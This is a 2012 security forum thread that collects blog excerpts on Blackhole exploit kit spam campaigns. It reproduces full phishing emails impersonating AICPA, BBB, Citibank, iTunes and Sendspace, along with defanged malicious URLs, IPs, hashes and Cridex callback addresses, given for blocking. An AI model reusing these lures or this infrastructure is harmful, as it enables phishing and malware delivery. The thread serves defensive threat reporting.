5 Dec 2012 - "... according to Sophos*, 30.81% of sites hosting it are in the United States, which is followed by Russia at 17.88% and Chile at 10.77%. Sophos says that between October 2011 and March 2012, almost 30% of detected threats were either directly from Blackhole or diversions to Blackhole kits that had been rigged on formerly reputable sites... Sophos says that in 2012 the biggest problems were cloud services, the Bring Your Own Device (BYOD) movement, hacking of SQL databases, improving social engineering methods, and an increasing number of attacks on the Android mobile operating system. The latter has seen everything from SMS fraud, apparent botnets on phones, banking malware, and bogus or rogue applications from application stores..."
* http://www.sophos.com/en-us/security-news-trends/reports/security-threat-report/blackhole-exploit.aspx
Video - 3:02
Drive-by redirects and exploit sites - attack landscape on the net (graphic)
> http://www.h-online.com/security/news/item/Sophos-s-2013-threat-report-points-to-US-as-Blackhole-capital-1762913.html?view=zoom;zoom=4
Defenses against the Blackhole exploit kit
>> https://en.wikipedia.org/wiki/Blackhole_exploit_kit#Defenses_against_the_Blackhole_exploit_kit
" ... Make sure the browser, browser's plugins, and operating system are up to date..."
Test your browser here: https://browsercheck.qualys.com/?scan_type=js
___
- https://blogs.technet.com/b/security/archive/2012/11/12/blackhole-exploit-kit-activity-peaks-as-exploit-activity-on-the-internet-reaches-new-heights.aspx?Redirected=true
12 Nov 2012 - "... Blacole, a family of exploits used by the so-called Blackhole exploit kit to deliver malicious software through infected webpages, was the most commonly detected exploit family in the first half of 2012 by a large margin..."
> https://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-components-imagefileviewer/communityserver-blogs-components-weblogfiles-00-00-00-50-43/3683.2.jpg_2D00_550x0.jpg
Vulnerabilities targeted by the Blacole exploit kit in 1Q12 and 2Q12
> https://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-components-imagefileviewer/communityserver-blogs-components-weblogfiles-00-00-00-50-43/3225.3.jpg_2D00_550x0.jpg
:fear: :mad:
AplusWebMaster
2012-12-07, 20:17
FYI...
Malicious ‘Security Update for Banking Accounts’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/07/malicious-security-update-for-banking-accounts-emails-lead-to-black-hole-exploit-kit/
Dec 7, 2012 - "Cybercriminals have recently launched yet another massive spam campaign attempting to trick e-banking users into thinking that their ability to process ACH transactions has been temporarily disabled. Upon clicking on the link found in the malicious email, users are exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/security_update_banking_email_spam_exploits_malware.png
Sample spamvertised compromised URLs:
hxxp ://promic .pl/page4.htm
hxxp ://promic .pl/rating.htm
Sample client-side exploits serving URLs:
hxxp ://bamanaco .ru:8080/forum/links/column.php
hxxp ://lentuiax .ru:8080/forum/links/column.php
Malicious domains reconnaissance:
bamanaco.ru – 82.165.193.26 (AS8560); 203.80.16.81 (AS24514); 216.24.196.66 (AS40676)
Name servers:
ns1.bamanaco .ru - 62.76.178.233
ns2.bamanaco .ru – 41.168.5.140
ns3.bamanaco .ru – 132.248.49.112
ns4.bamanaco .ru – 209.51.221.247
lentuiax .ru – 203.80.16.81 (AS24514)
Name servers:
ns1.lentuiax .ru – 62.76.178.233
ns2.lentuiax .ru – 41.168.5.140
ns3.lentuiax .ru – 132.248.49.112
ns4.lentuiax .ru – 209.51.221.247
Sample detection rate for the redirection script: MD5: 35e6ddb6ce4229d36c43d9d3ccd182f3 * ... Trojan-Downloader.JS.Iframe.dby.
Although we couldn’t reproduce the malicious exploitation taking place through bamanaco .ru and lentuiax .ru, we found out that, during the time of the attack, similar client-side exploit serving URls were also responding to the same IPs, leading us to the actual malicious payload found on two of these domains..."
(More detail available at the webroot URL above.)
* https://www.virustotal.com/file/ff5efbf5e293fb849108494d6d2c1d0e452da5d4e817b9c2d293c174c3e7aab1/analysis/1353822844/
File name: August.html
Detection ratio: 21/44
Analysis date: 2012-11-25
___
Fake PayPal Emails: Windows 8 and Vintage Photo Collections
- http://www.gfi.com/blog/fake-paypal-emails-windows-8-and-vintage-photo-collections/
Dec 7, 2012 - "If you want to panic over a mysterious transaction on Ebay to the tune of $564.48 for a “Microsoft Windows 8 Pro Anytime Upgrade”, then this is probably the email you’ve been waiting for.
It reads:
You have made an Ebay.com purchase.
Hello [removed],
You sent a payment of $564.48 USD to [removed].
Microsoft Windows 8 Pro Anytime Upgrade
Item# 16 $564.48 USD
> http://www.gfi.com/blog/wp-content/uploads/2012/12/ebaywin8.png
Clicking the link in the fake PayPal email will take end-users to the usual round of Cridex / Blackhole URLs. On a similar note, there’s an additional email floating around that claims you purchased 84 copies of “Vintage photo collection sexy college girls 1990s or 2000s”.
> http://www.gfi.com/blog/wp-content/uploads/2012/12/ebaywin82.png
Last time we saw this one was back in June* where the tally was -23- ..."
* http://blog.dynamoo.com/2012/06/paypal-spam-itscholarshipznet.html
___
iTunes "Christmas gift card" SPAM / api.myobfuscate .com / nikolamireasa .com
- http://blog.dynamoo.com/2012/12/itunes-christmas-gift-card.html
6 Dec 2012 - "Here's a malware-laden spam with a twist:
From: iTunes [shipping @new. itunes .com]
To: purchasing [purchasing @ [redacted]]
Date: 6 December 2012 20:59
Subject: Christmas gift card
Order Number: M1V7577311
Receipt Date: 06/12/2012
Shipping To: purchasing @[redacted]
Order Total: $500.00
Billed To: Hilary Shandonay, Credit card
Item Number Description Unit Price
1 Christmas gift card (View\Download ) $500.00
Subtotal: $500.00
Tax: $0.00
Order Total: $500.00
Please retain for your records.
Please See Below For Terms And Conditions Pertaining To This Order.
Apple Inc.
You can find the iTunes Store Terms of Sale and Sales Policies by launching your iTunes application and clicking on Terms of Sale or Sales Policies
FBI ANTI-PIRACY WARNING
UNAUTHORIZED COPYING IS PUNISHABLE UNDER FEDERAL LAW.
Answers to frequently asked questions regarding the iTunes Store can be found at http ://www.apple .com/support/itunes/store/
Apple ID Summary ??????????¬?‚?? Detailed invoice
Apple respects your privacy.
Copyright ??????‚?© 2011 Apple Inc. All rights reserved
In this case the link goes through a free web hosting site at [donotclick]longa-neara.ucoz .org which contains some heavily obfuscated javascript that eventually leads to a malicious landing page on [donotclick]nikolamireasa .com/less/demands-probably.php hosted on 188.93.210.133 (logol .ru, Russia). That IP hosts the following toxic domains that you should block:
nikolamireasa .com
portgazza. cu .cc
hopercac. cu .cc
hopercas. cu .cc
ukumuxur. qhigh .com
ymuvyjih.25u .com
... you might just want to cut your losses and block 188.93.210.0/23 too. Anyway, the curious thing is that the malicious javascript uses an intermediary obfuscation site called api.myobfuscate .com... if the bad guys have a use for it then you can bet they are probably about to abuse it in a big way. Both api.myobfuscate .com and www .myobfuscate .com are hosted on the same IP at 188.64.170.17 (also in Russia) which is part of a tiny netblock of 188.64.170.16/31 which you may as well block too. The 188.64.170.17 IP also contains the following domains which might also be abused in the same way:
htmlobfuscator .com
api.htmlobfuscator .com
htmlobfuscator .info
javascript-obfuscator .info
javascriptcompressor .info
javascriptcrambler .com
javascriptobfuscate .com
javascriptobfuscator .info
myobfuscate .com
api.myobfuscate .com
obfuscatorjavascript .com
api.obfuscatorjavascript .com
js.robotext .com
js.robotext .info
js.robottext .ru
In my opinion, obfuscating javascript is a really bad thing and there is no legitimate reason to use it. Blocking access to free-to-use obfuscation tools like this may run the risk of breaking some legitimate sites. But only if they have been coded by idiots."
- http://www.avgthreatlabs.com/webthreats/
... last updated on Dec 08, 2012 GMT.
Viruses & Threats on the Rise
1) Cool Exploit Kit - 19.24% of all detections...
2) Blackhole Exploit Kit - 19.16% of all detections...
3) JavaScript Obfuscation - 12.70% of all detections...
___
AICPA SPAM / ibertomoralles .org
- http://blog.dynamoo.com/2012/12/aicpa-spam-ibertomorallesorg.html
7 Dec 2012 - "I haven't seen fake AICPA spam like this for a while, it leads to malware on ibertomoralles .org:
From: AICPA [noreply@aicpa.org]
Date: 7 December 2012 16:55
Subject: Your accountant license can be cancelled.
You're receiving this information as a Certified Public Accountant and a member of AICPA.
Having any problems reading this email? See it in your favorite browser.
AICPA logo
Revocation of CPA license due to income tax fraud accusations
Dear AICPA participant,
We have been informed of your potential involvement in tax return swindle on behalf of one of your employers. In obedience to AICPA Bylaw Article 700 your Certified Public Accountant position can be discontinued in case of the aiding of filing of a phony or fraudulent income tax return for your client or employer.
Please be notified below and provide explanation of this issue to it within 14 work days. The rejection to provide elucidation within this time-frame would finish in decline of your Accountant status.
Delation.pdf
The American Institute of Certified Public Accountants.
Email: service @aicpa .org
Tel. 888.777.7077
Fax. 800.362.5066
===================
Date: Fri, 7 Dec 2012 18:31:58 +0100
From: "AICPA" [do-not-reply @aicpa .org]
Subject: Tax return assistance contrivance.
You're receiving this note as a Certified Public Accountant and a part of AICPA.
Having any problems reading this email? See it in your favorite browser.
Cancellation of Public Account Status due to tax return indictment
Respected accountant officer,
We have received a note of your presumable interest in income tax fraud for one of your clients. In concordance with AICPA Bylaw Article 600 your Certified Public Accountant status can be discontinued in case of the event of submitting of a fake or fraudulent income tax return on the member's or a client's behalf.
Please familiarize yourself with the complaint below and provide your feedback to it within 14 work days. The rejection to respond within this time-frame will result in end off of your CPA license.
Delation.doc
The American Institute of Certified Public Accountants.
Email: service@aicpa.org
Tel. 888.777.7077
Fax. 800.362.5066
The malicious payload is at [donotclick]ibertomoralles.org/detects/five-wise_leads_ditto.php hosted on the same Chinese IP address of 59.57.247.185 as used in this spam yesterday*."
* http://blog.dynamoo.com/2012/12/ebay-paypal-spam-ibertomorallescom.html
___
BBB SPAM / ibertomoralles .org
- http://blog.dynamoo.com/2012/12/bbb-spam-ibertomorallesorg.html
"This bizarrely worded fake BBB spam leads to malware on ibertomoralles .org:
Date: Fri, 7 Dec 2012 18:43:08 +0100
From: "Better Business Bureau" [complaint @bbb .org]
Subject: BBB Complaint No.65183683
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau �
Start With Trust �
Fri, 7 Dec 2012
RE: Complaint N. 65183683
Hello
The Better Business Bureau has been booked the above said complaint from one of your purchasers in regard to their business relations with you. The detailed description of the consumer's disturbance are available visiting a link below. Please give attention to this point and let us know about your mind as soon as possible.
We amiably ask you to overview the GRIEVANCE REPORT to reply on this claim letter.
We are looking forward to your prompt reaction.
Faithfully yours
Natalie Richardson
Dispute Councilor
Better Business Bureau
3073 Wilson Blvd, Suite 600 Arlington, VA 28201
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This message was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
====================
Date: Fri, 7 Dec 2012 19:42:23 +0200
From: "Better Business Bureau" [noreply@bbb.org]
Subject: BBB Appeal No.05P610Q78
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau �
Start With Trust �
Fri, 7 Dec 2012
RE: Case # 05P610Q78
Hello
The Better Business Bureau has been filed the above said reclamation from one of your customers in respect of their dealings with you. The details of the consumer's disturbance are available at the link below. Please pay attention to this issue and notify us about your sight as soon as possible.
We politely ask you to visit the PLAINT REPORT to meet on this claim.
We are looking forward to your prompt reaction.
Yours respectfully
Dylan Peterson
Dispute Councilor
Better Business Bureau
3003 Wilson Blvd, Suite 600 Arlington, VA 25301
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This message was delivered to [redacted] Don't want to receive these emails anymore? You can unsubscribe
====================
From: Better Business Bureau [mailto:information@bbb.org]
Sent: Fri 07/12/2012 17:01
Subject: Better Business Beareau Pretension No.S8598593
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust
Fri, 7 Dec 2012
RE: Complaint N. S8598593
Valued client
The Better Business Bureau has been entered the above mentioned grievance from one of your clientes with reference to their dealings with you. The details of the consumer's worry are available at the link below. Please give attention to this problem and let us know about your opinion as soon as possible.
We pleasantly ask you to click and review the CLAIM LETTER REPORT to respond on this grievance.
We awaits to your prompt response.
WBR
Aiden Thompson
Dispute Advisor
Better Business Bureau
3003 Wilson Blvd, Suite 600 Arlington, VA 26701
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This letter was delivered to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The payload and IP addresses are exactly the same as the ones found in this spam run*."
* http://blog.dynamoo.com/2012/12/aicpa-spam-ibertomorallesorg.html
___
Sendspace "You have been sent a file" SPAM / pelamutrika .ru
- http://blog.dynamoo.com/2012/12/sendspave-you-have-been-sent-file-spam.html
7 Dec 2012 - "This fake Sendspace spam leads to malware on pelamutrika .ru:
Date: Fri, 7 Dec 2012 10:53:57 +0200
From: Badoo [noreply @badoo .com]
Subject: You have been sent a file (Filename: [victimname]-64.pdf)
Sendspace File Delivery Notification:
You've got a file called [victimname]-792244.pdf, (337.19 KB) waiting to be downloaded at sendspace.(It was sent by CHASSIDY PROCTOR).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
----------------------------------------------------------------------
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
The malicious payload is at [donotclick]pelamutrika .ru:8080/forum/links/column.php hosted on the following familiar IP addresses which you should definitely try to block:
202.180.221.186 (GNet, Mongolia)
208.87.243.131 (Psychz Networks, US)"
___
Searching for “Windows Android Drivers” Leads to Malware and Bogus Google Play Markets
- http://www.gfi.com/blog/searching-for-windows-android-drivers-leads-to-malware-and-bogus-google-play-markets/
7 Dec 2012 - "If you’re on the lookout for Android USB drivers for your Windows OS, be very careful. Such strings like “Windows Android Drivers” or combinations of these may bring up results that you would rather stay away from. Our researchers in the AV Labs have found this peculiar search result on Yahoo!... Visiting the Russian URL, bestdrivers(dash)11(dot)ru, automatically downloads a file called install.exe... Running the .exe file, which is a Trojan that we detect as Trojan.Win32.Generic!BT, allows it to modify the start page of the user’s IE browser to 94(dot)249(dot)188(dot)143/stat/tuk/187, a sign-up page for a Russian “escort” site. It does this so users are directed to the page by default whenever they open their IE browser..." (-aka- Hijacked...)
(More detail and screenshots at the gfi URL above.)
___
Christmas themed SCAMS on Facebook ...
- http://community.websense.com/blogs/securitylabs/archive/2012/12/06/merry-xmas-on-facebook.aspx
06 Dec 2012 - "... We spotted more than 3,000 unique URLs used for this scam on Facebook. The high variation is used by cyber criminals to assure persistence and redundancy in case some URLs or domains get blacklisted.
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/1007.Facebook_5F00_xmas.jpg
... Here are some of the offending IP addresses found to be part of the scam infrastructure hosting the scam web sites:
208.73.210.147
213.152.170.193
184.107.164.158
216.172.174.53
199.188.206.214
198.187.30.161
198.154.102.28
68.168.21.68
198.154.102.29
174.132.156.176
198.154.102.27
88.191.118.153
208.91.199.252
We believe that this attack is now under control and is being successfully mitigated by Facebook. We're seeing a gradual decline in incidences, but it's safe to say that while it's declining it's still going strong..."
:mad: :mad: :mad:
AplusWebMaster
2012-12-10, 18:23
FYI...
Fake Sendspace SPAM "You have been sent a file" / anifkailood .ru:
- http://blog.dynamoo.com/2012/12/you-have-been-sent-file-sendspace-spam.html
10 Dec 2012 - "This fake Sendspace spam leads to malware on anifkailood .ru:
Date: Mon, 10 Dec 2012 06:01:01 -0500
From: "Octavio BOWMAN" [AdlaiBaldacci @telefonica .net]
Subject: You have been sent a file (Filename: [redacted]-722.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-018.pdf, (767.2 KB) waiting to be downloaded at sendspace.(It was sent by Octavio BOWMAN).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
The malicious payload is at [donotclick]anifkailood .ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186 (GNet, Mongolia)
212.162.52.180 (Secure Netz, Germany)
212.162.56.210 (Secure Netz, Germany)..."
___
Fake AICPA SPAM / eaglepointecondo .co
- http://blog.dynamoo.com/2012/12/aicpa-spam-eaglepointecondoco.html
10 Dec 2012 - "This fake AICPA spam leads to malware on eaglepointecondo .co:
Date: Mon, 10 Dec 2012 19:29:21 +0400
From: "AICPA" [alerts@aicpa.org]
Subject: Income fake tax return accusations.
You're receiving this email as a Certified Public Accountant and a member of AICPA.
Having difficulties reading this email? Take a look at it in your browser.
Termination of Public Account Status due to income tax fraud allegations
Respected accountant officer,
We have received a denouncement about your probable interest in income tax return swindle for one of your customers. In concordance with AICPA Bylaw Head # 500 your Certified Public Accountant status can be revoked in case of the occurrence of submitting of a faked or fraudulent income tax return for your client or employer.
Please be notified below and provide explanation of this issue to it within 21 business days. The rejection to provide elucidation within this period would finish in end off of your CPA license.
SubmittedReport.doc
The American Institute of Certified Public Accountants.
Email: service @aicpa .org
Tel. 888.777.7077
Fax. 800.362.5066
The malicious payload is at [donotclick]eaglepointecondo .co/detects/denouncement-reports.php hosted on 59.57.247.185 in China, which has been used a few times recently* for malware distribution..."
* http://blog.dynamoo.com/search?q=59.57.247.185
> http://www.aicpa.org/news/featurednews/pages/alert-fraudulent-email.aspx
Your CPA License has -not- been revoked
- https://isc.sans.edu/diary.html?storyid=14674
Last Updated: 2012-12-10 - "I have been seeing some e-mails hitting my spam traps today, warning me of my revoked CPA license. No, I am not a CPA. But the e-mails are reasonably well done, so I do think some CPAs may fall for them. At least they got the graphics nice and pretty, but the text could be better worded.
> https://isc.sans.edu/diaryimages/images/CPAEmail.png
The only clickable link is the "Delation.pdf" (maybe that should be deletion?). Upon clicking the link, we are send on the usual malware redirect loop:
The first stop is httx ://tesorogroup .com/components/com_ag_google_analytics2/taxfraudalert.html
It includes javascript and meta tag redirects to
httx ://eaglepointecondo. co/ detects /denouncement-reports.php
... which will test our browser for vulnerable plugins and try to run a java applet. Looks all very "standard". You may want to check your DNS server logs for anybody resolving tesorogroup.com or eaglepointecondo.co . The two host currently resolve to 64.15.152.49 and 59.57.247.185 respectively.
Wepawet does a nice job analysing the obfuscated javascript:
http://wepawet.iseclab.org/view.php?hash=c390cd570069882395e24b7a30abbe64&t=1355160668&type=js ..."
___
Facebook SCAM goes wild - doubles over the weekend ...
- http://community.websense.com/blogs/securitylabs/archive/2012/12/10/jackfrost-facebook-scam-going-wild-and-doubles-over-the-weekend.aspx
10 Dec 2012 - "Last week we wrote a blog* about a specific Facebook scam that appeared to spread rather aggresively... Websense.. detected that the scam has increased and multiplied over the weekend - particularly on Saturday where we saw the amount of unique URLs related to this scam double. This shows how cyber crooks time their attacks to times where users are more laid back and when the security community is less likely to alert users on this type of threat... The scam spreads using click-jacking techniques and employs a mass number of varied scam hosts by using the infrastructure of the legitimate service at freedns.afraid .org... A graph showing the volume of unique scam URLs vs. active URLs (available URLs) over the past few days:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/0028.Facebook_5F00_xmas_5F00_23.jpg
Screenshot of the scam's main page:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7573.Facebook_5F00_xmas_5F00_24.jpg
How the scam looks like in Facebook's new feed. The scam uses varied sexual implied images and varied enticing wording to lure for user's clicks:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/8780.Facebook_5F00_xmas_5F00_25.jpg
* http://community.websense.com/blogs/securitylabs/archive/2012/12/06/merry-xmas-on-facebook.aspx
Facebook Spam leverages/abuses Instagram App
- http://blog.trendmicro.com/trendlabs-security-intelligence/facebook-spam-leverages-abuses-instagram-app/
Dec 10, 2012 - "... social networking sites have been often used to proliferate malware. Just recently, we spotted a Facebook clickjacking attack that leverages and abuses Instagram to point users to malicious websites. Users encounter this threat by being tagged in a photo posted by one of their contacts on Facebook. The post states that users can know who visited their profile on Faceboofk and how often. It also includes a photo posted via Instagram. We noticed that the photo and the names used in the “Recent Profile Views” (see below) are used repeatedly for other attacks.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/12/facebook_post_screenshot.gif
Should users decide to click the link, they are lead to a page with instructions on how to generate the verification code. Once done, a pop-up window appears, which is actually the Instagram for Facebook app asking users to click “Go to App” button. Once done, it -redirects- users to a page that looks like the Facebook Home page.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/12/redirection_page_facebook.gif
... the address bar is different from the legitimate Facebook homepage. Users are then asked to copy and paste the malicious URL (which varies per user) in a certain dialog box and to click ‘continue’... the link so far gathered 825,545 clicks worldwide, mostly coming from the Philippines and India. The said link is attributed to the account maygup88, who is also responsible for other 130 domains blocked. This type of threat on Facebook has taken on different forms these past months, usually under the veil of popular brands such as Diablo 3 and iPad. It even expanded to other social networking sites like Pinterest and Tumblr, which only means one thing: users are still falling for these scams. With this in mind, users are advised to take precautionary steps such as double-checking the legitimacy of links and posts. And remember: just because a contact posted that link, it does not mean it’s safe..."
___
AICPA SPAM / eaglepointecondo .org
- http://blog.dynamoo.com/2012/12/aicpa-spam.html
10 Dec 2012 - "Yet another fake AICPA spam run today with a slightly different domain from before, now on eaglepointecondo .org:
Date: Mon, 10 Dec 2012 18:51:38 +0100
From: "AICPA" [info @aicpa .org]
Subject: Tax return assistance fraud.
You're receiving this message as a Certified Public Accountant and a part of AICPA.
Having any issues reading this email? Overview it in your favorite browser.
Suspension of CPA license due to income tax indictment
Valued AICPA participant,
We have been notified of your potential participation in income tax refund shady transactions for one of your customers. In concordance with AICPA Bylaw Head # 740 your Certified Public Accountant status can be terminated in case of the act of submitting of a phony or fraudulent tax return for your client or employer.
Please be informed of the complaint below and respond to it within 7 work days. The refusal to respond within this period will finish in cancellation of your Accountant status.
Delation.pdf
The American Institute of Certified Public Accountants.
Email: service @aicpa .org
Tel. 888.777.7077
Fax. 800.362.5066
===================
Date: Mon, 10 Dec 2012 14:50:40 -0300
From: "AICPA" [noreply @aicpa .org]
Subject: Your accountant license can be end off.
You're receiving this message as a Certified Public Accountant and a part of AICPA.
Having problems reading this email? Review it in your browser.
Suspension of Accountant status due to tax return fraud prosecution
Respected AICPA member,
We have received a complaint about your alleged participation in income tax return fraudulent activity for one of your employees. In accordance with AICPA Bylaw Section No. 500 your Certified Public Accountant license can be terminated in case of the event of presenting of a false or fraudulent tax return for your client or employer.
Please find the complaint below below and provide your feedback to it within 3 work days. The rejection to provide the clarifications within this time-frame would abide in end off of your Certified Accountant Career.
SubmittedReport.pdf
The American Institute of Certified Public Accountants.
Email: service @aicpa .org
Tel. 888.777.7077
Fax. 800.362.5066
In this case the malicious payload is at [donotclick]eaglepointecondo .org/detects/denouncement-reports.php hosted on 59.57.247.185 in China, as with the earlier spam run today*."
* http://blog.dynamoo.com/2012/12/aicpa-spam-eaglepointecondoco.html
___
GFI Labs Email Roundup for the Week
- http://www.gfi.com/blog/gfi-labs-email-roundup-for-the-week-5/
Dec 10, 2012 - "... noteworthy email threats for the week of December 3 to 7:
- Phishers Target Wells Fargo Clients
- Message from the Department of Investigations
- Amazon eBook Spam in the Wild
- Spam from AICPA ...
(More detail and screenshots at the gfi URL above.)
:mad::mad:
AplusWebMaster
2012-12-11, 19:40
FYI...
Fake Changelog SPAM / aseniakrol .ru
- http://blog.dynamoo.com/2012/12/changelog-spam-aseniakrolru.html
11 Dec 2012 - "This spam leads to malware on aseniakrol .ru:
Date: Tue, 11 Dec 2012 10:46:43 -0300
From: Tarra Comer via LinkedIn [member @linkedin .com]
Subject: Re: Your Changelog UPDATED
Hi,
as promised your changelog - View
I. Easley
The malicious payload is at [donotclick]aseniakrol .ru:8080/forum/links/column.php hosted on a bunch of IPs that have been used for malware before:
202.180.221.186 (GNet, Mongolia)
212.162.52.180 (Secure Netz, Germany)
212.162.56.210 (Secure Netz, Germany)..."
:fear: :mad:
AplusWebMaster
2012-12-12, 14:41
FYI...
Fake Sendspace emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/12/malicious-sendspace-file-delivery-notifications-lead-to-black-hole-exploit-kit/
Dec 12, 2012 - "Cybercriminals are currently attempting to trick hundreds of thousands of users into clicking on the malicious links found in the currently spamvertised -bogus- ‘Sendspace File Delivery Notifications‘. Upon clicking on any of the links found in the email, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/email_spam_exploits_malware_social_engineering_black_hole_exploit_kit.png
... Sample client-side exploits served: CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: 532bdd2565cae7b84cb26e4cf02f42a0 * ... Worm:Win32/Cridex.E
Once executed it creates %AppData%\kb00121600.exe on the affected system.
The sample also creates the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B
As well as the following Mutexes:
Local\XMM00000418
Local\XMI00000418
Local\XMRFB119394
Local\XMM000005E4
Local\XMI000005E4
Local\XMM0000009C
Local\XMI0000009C
Local\XMM000000C8
Local\XMI000000C8
It then phones back to hxxp ://210.253.102.95 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/ and to hxxp ://123.49.61.59 :8080/AJtw/UCyqrDAA/Ud+asDAA/ ..."
(More detail at the webroot URL above.
* https://www.virustotal.com/file/a0703de85f59b501935eff571a6c6b6f9e30c03c703a678abe699019e2c1eb2b/analysis/
File name: contacts.exe.x-msdownload
Detection ratio: 33/44
Analysis date: 2012-11-13
___
Fake Citibank SPAM / platinumbristol .net
- http://blog.dynamoo.com/2012/12/citibank-spam-platinumbristolnet.html
12 Dec 2012 - "This fake Citibank spam leads to malware on platinumbristol .net:
From: citibankonline @serviceemail1 .citibank .com via pado .com .br
Date: 12 December 2012 15:38
Subject: Account Alert
Mailed-by: pado .com .br
Citi
Email Security Zone EMAIL SECURITY AREA
ATM/Credit card ending in: XXX7
Alerting System
Bill Payment
Ultimate Savings Account (USA) XXXXXXXXX2
Amount Debited: $2,973.22
Date: 12/12/12
Log In to Overview Transaction
Bill Payment
Ultimate Savings Account (USA) XXXXXXXXX2
Amount Credited: $.97
Date: 12/12/12
Visit this link to Overview Detailed information
ABOUT THIS MESSAGE
Please DO NOT reply to this message. auomatic informational system unable to accept incoming messages.
Citibank, N.A. Member FDIC.
Š 2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
========================
From: citibankonline @serviceemail5 .citibank .com via clickz .com
Date: 12 December 2012 15:39
Subject: Account Notify
Mailed-by: clickz .com
Citi
Email Security Zone EMAIL SAFETY AREA
ATM/Debit card ending in: XXX7
Alerting System
Money Transfer Report
Savings Account XXXXXXXXX8
Amount Withdrawn: $3,620.11
Date: 12/12/12
Visit this link to Cancel Details
Money Transfer Report
Savings Account XXXXXXXXX8
Amount Withdrawn: $.38
Date: 12/12/12
Sign In to Overview Details
ABOUT THIS MESSAGE
Please Not try to reply to this message. automative notification system unable to accept incoming messages.
Citibank, N.A. Member FDIC.
© 2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
========================
Date: Wed, 12 Dec 2012 23:16:15 +0700
From: alets-no-reply @serviceemail6 .citibank .com
Subject: Account Insufficient funds
EMAIL SAFETY ZONE
ATM/Debit card ending in: XXX0
Notifications System
Transaction Announcement
Ultimate Savings Account (USA) XXXXXXXXX4
Amount Debited: $4,222.19
Date: 12/12/12
Login to Abort Detailed information
Transaction Announcement
Ultimate Savings Account (USA) XXXXXXXXX4
Amount Credited: $.41
Date: 12/12/12
Go to web site by clicking here to See Operation
ABOUT THIS MESSAGE
Please Not try to reply to this message. automative notification system cannot accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
========================
Date: Wed, 12 Dec 2012 20:07:46 +0400
From: citibankonline @serviceemail8 .citibank .com
Subject: Account Operation Alert
EMAIL SECURITY ZONE
Credit card ending in: XXX0
Notifications System
Bill Payment
Ultimate Savings Account (USA) XXXXXXXXX3
Amount Credited: $5,970.51
Date: 12/12/12
Click Here to Review Transaction
Bill Payment
Ultimate Savings Account (USA) XXXXXXXXX3
Amount Withdrawn: $.11
Date: 12/12/12
Sign In to View Operation
ABOUT THIS MESSAGE
Please don't reply to this message. auomatic informational system cannot accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
The malicious payload is at [donotclick]platinumbristol .net/detects/alert-service.php hosted on the same 59.57.247.185 IP address in China that has been used in several recent attacks. This is definitely an IP to block if you can.
I can see the following evil domains on that same server..."
(More detail at the dynamoo URL above.)
:mad:
AplusWebMaster
2012-12-13, 14:30
FYI...
Fake Citi Cards SPAM / 6.bbnface .com and 6.mamaswishes .com
- http://blog.dynamoo.com/2012/12/citi-cards-spam-6bbnfacecom-and.html
13 Dec 2012 - "This fake Citi Cards spam leads to malware on 6.bbnface .com and 6.mamaswishes .com:
Date: Thu, 13 Dec 2012 11:59:33 +0300
From: Citi Cards [citicards @info .citibank .com]
Subject: Your Citi Credit Card Statement
Add citicards @info .citibank .com to your address book to ensure delivery.
Your Account: Important Notification
Your Citi Credit Card statement is ready to view online
Dear customer,
Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from your statement:
Statement Date: December 13, 2012
Statement Balance: -$8,803.77
Minimum Payment Due: $750.00
Payment Due Date: Tue, January 01, 2013
Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.
To set up alerts sign on to www .citicards .com and go to Account Profile.
Iprefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
